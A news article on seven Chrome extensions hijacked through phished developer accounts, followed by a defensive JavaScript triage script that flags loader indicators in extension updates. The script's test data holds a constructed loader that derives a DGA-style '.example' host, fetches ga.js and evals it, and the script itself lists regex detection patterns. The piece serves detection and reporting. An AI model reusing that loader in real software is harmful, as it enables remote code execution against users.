Google Chrome extensions on the radar of cybercriminals: security researchers identify seven more compromised extensions
Last month we reported that the Google Chrome extension Copyfish had been hijacked after its developer fell for a phishing email and entered his Google account credentials on the attacker's page. At the time we treated it as an isolated mistake on the developer's part and dismissed the likelihood of another such incident. We have since been proven wrong: Proofpoint security researchers report that at least seven more Chrome extensions have been compromised.
The researchers state that the attacker obtained developers' Google account credentials through a phishing campaign and used them to compromise seven widely installed extensions, exposing a large number of users to credential theft and traffic hijacking.
In their blog post, Proofpoint researchers named the compromised Chrome extensions:
“We specifically examined the “Web Developer 0.4.9” extension compromise, but found evidence that “Chrometana 1.1.3”, “Infinity New Tab 3.12.3”, “CopyFish 2.8.5”, “Web Paint 1.2.1”, and “Social Fixer 20.1.1” were modified using the same modus operandi by the same actor. We believe that the Chrome Extensions TouchVPN and Betternet VPN were also compromised in the same way at the end of June,” the blog post reads.
The motive is the familiar one: cybercriminals and spammers are constantly looking for new ways to drive traffic to their affiliate programmes and to push unwanted, malicious ads into victims' browsers. The attacks were observed at the end of July and the beginning of August. Once they had the developers' credentials, the attackers were able to publish “malicious versions of legitimate extensions,” the Proofpoint researchers stated.
As with Copyfish, the criminals tricked extension developers into giving up their Google account credentials, which were then used to log into the Google developer accounts linked to the extensions. With that access established, the attackers added malicious code to the extensions and published the modified versions under the developers' own accounts.
“(The) malvertising chain that brings users from the fake alert to an affiliate site; we observed the compromised extension directing victims to two such affiliates, although others may also have been used,” the Proofpoint blog post revealed.
The affiliate landing pages, browser-update[.]info, Browser-Update[.]info and searchtab[.]win, showed substantial traffic: searchtab[.]win alone recorded 920,000 visits in a month. It is not clear, however, how much of that traffic was generated by the compromised Chrome extensions.
On August 12th, Chris Pederick, the developer of the Web Developer extension for Chrome, tweeted that his extension had been compromised and that a hijacked version 0.4.9 had been uploaded and was being distributed. It was this tweet that alerted Proofpoint researchers to the latest round of extension hijacks. Proofpoint retrieved the compromised version and isolated the injected code. Analysis of that code showed that it fetched a remote file named ga.js over HTTPS from a server whose domain was produced by a domain generation algorithm (DGA), so the callback address changes over time rather than being a fixed hostname that could simply be blocklisted.
“The code from this first step allows the threat actors to conditionally call additional scripts, including some to harvest Cloudflare credentials,” the researchers said.
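The loader pattern described above (a published update that fetches a remote script from a runtime-computed hostname and executes it, with broadened permissions to go with it) is something a defender can triage statically before accepting an extension update. The following is an added example written for this article, not code from Proofpoint or from any of the affected extensions; the extension name, file names, permission list, sample sources and the `.example` hostname are all constructed, and the `likely-remote-loader` verdict is a heuristic, not a signature of the real malware.

```javascript
// Added example (not code from the article or Proofpoint): static triage of an
// unpacked Chrome extension for the loader pattern described above: a script that
// fetches a remote file from a hostname computed at runtime and executes it.
// All extension names, files and sample sources below are constructed.
'use strict';

// Regexes over script source. Each hit carries a weight towards a review score.
const INDICATORS = [
  { id: 'remote-fetch', weight: 1, re: /\b(fetch|XMLHttpRequest|importScripts)\s*\(/,
    note: 'loads a remote resource at runtime' },
  { id: 'dynamic-eval', weight: 2, re: /\b(eval|Function)\s*\(|\.(innerHTML|outerHTML)\s*=|document\.write\s*\(/,
    note: 'executes code held in a string' },
  { id: 'computed-host', weight: 2, re: /["'`]https?:\/\/["'`]\s*\+|`https?:\/\/\$\{/,
    note: 'URL host is assembled at runtime (DGA-style)' },
];

// Permissions that let an extension read or redirect traffic on any site.
const RISKY_PERMISSIONS = ['<all_urls>', 'webRequest', 'webRequestBlocking', 'proxy', 'tabs', 'cookies'];

function triageManifest(manifest) {
  const findings = [];
  const perms = [].concat(manifest.permissions || [], manifest.host_permissions || []);
  for (const p of perms) {
    if (RISKY_PERMISSIONS.includes(p) || /^\*:\/\/\*\//.test(p)) {
      findings.push({ id: 'broad-permission', file: 'manifest.json', detail: p, weight: 1 });
    }
  }
  // MV2 keeps the CSP as a string; MV3 nests it under extension_pages.
  const csp = typeof manifest.content_security_policy === 'string'
    ? manifest.content_security_policy
    : (manifest.content_security_policy || {}).extension_pages || '';
  if (/unsafe-eval/.test(csp)) findings.push({ id: 'csp-unsafe-eval', file: 'manifest.json', detail: csp, weight: 1 });
  if (/script-src[^;]*https?:\/\//.test(csp)) findings.push({ id: 'csp-remote-script', file: 'manifest.json', detail: csp, weight: 2 });
  return findings;
}

function triageScript(file, source) {
  const findings = [];
  for (const ind of INDICATORS) {
    const m = source.match(ind.re);
    if (m) findings.push({ id: ind.id, file, detail: m[0].trim(), weight: ind.weight, note: ind.note });
  }
  return findings;
}

// ext = { manifest: <parsed manifest.json>, scripts: { filename: sourceText } }
function triageExtension(ext) {
  const findings = triageManifest(ext.manifest);
  for (const [file, src] of Object.entries(ext.scripts)) findings.push(...triageScript(file, src));
  const ids = new Set(findings.map((f) => f.id));
  // The chain the article describes: remote fetch + computed host + string execution.
  const loaderChain = ids.has('remote-fetch') && ids.has('computed-host') && ids.has('dynamic-eval');
  const score = findings.reduce((s, f) => s + f.weight, 0);
  const verdict = loaderChain ? 'likely-remote-loader' : score >= 4 ? 'review' : 'ok';
  return { findings, score, verdict };
}

// Indicator ids present in a new version but absent from the version it replaces:
// the question to ask before accepting an update such as 0.4.8 -> 0.4.9.
function newIndicators(oldExt, newExt) {
  const before = new Set(triageExtension(oldExt).findings.map((f) => f.id));
  return [...new Set(triageExtension(newExt).findings.map((f) => f.id))].filter((id) => !before.has(id)).sort();
}

// Constructed sample: a benign content script, as in a typical developer tool.
const BENIGN_SCRIPT = `
  document.querySelectorAll('img').forEach(function (img) { img.style.outline = '1px solid red'; });
  chrome.storage.local.set({ lastRun: Date.now() });
`;

// Constructed sample loader modelled on the article's description: derive a host from
// the date, fetch ga.js from it over HTTPS, execute whatever comes back.
const SUSPICIOUS_LOADER = `
  function seed() { var d = new Date(); return '' + d.getUTCFullYear() + d.getUTCMonth(); }
  function host() {
    var s = seed(), h = 0;
    for (var i = 0; i < s.length; i++) h = (h * 31 + s.charCodeAt(i)) >>> 0;
    return 'x' + h.toString(36) + '.example';
  }
  fetch('https://' + host() + '/ga.js').then(function (r) { return r.text(); }).then(function (src) { eval(src); });
`;

const BENIGN = {
  manifest: { manifest_version: 2, name: 'Example Dev Tools', version: '0.4.8', permissions: ['storage', 'activeTab'] },
  scripts: { 'content.js': BENIGN_SCRIPT },
};

// Same extension after a malicious update: extra permissions, eval allowed, loader added.
const TROJANIZED = {
  manifest: { manifest_version: 2, name: 'Example Dev Tools', version: '0.4.9',
    permissions: ['storage', 'activeTab', 'tabs', 'webRequest', '<all_urls>'],
    content_security_policy: "script-src 'self' 'unsafe-eval'; object-src 'self'" },
  scripts: { 'content.js': BENIGN_SCRIPT, 'background.js': SUSPICIOUS_LOADER },
};

if (typeof require !== 'undefined' && require.main === module) {
  console.log(triageExtension(BENIGN).verdict, triageExtension(TROJANIZED).verdict);
  console.log(newIndicators(BENIGN, TROJANIZED));
}
```

Run with `node` to see the benign 0.4.8 package scored `ok` and the 0.4.9 package scored `likely-remote-loader`, with `newIndicators` listing exactly what the update introduced. Regex triage of this kind is a first pass only: it reads unpacked source, so it is defeated by obfuscation and by loaders that build their strings character by character, and it says nothing about what the remote script does once fetched. Its value is in the update diff: an extension whose new version suddenly needs `webRequest` and `<all_urls>`, relaxes its CSP to allow `unsafe-eval`, and gains a background script that talks to a computed hostname deserves a human look before it is allowed to roll out.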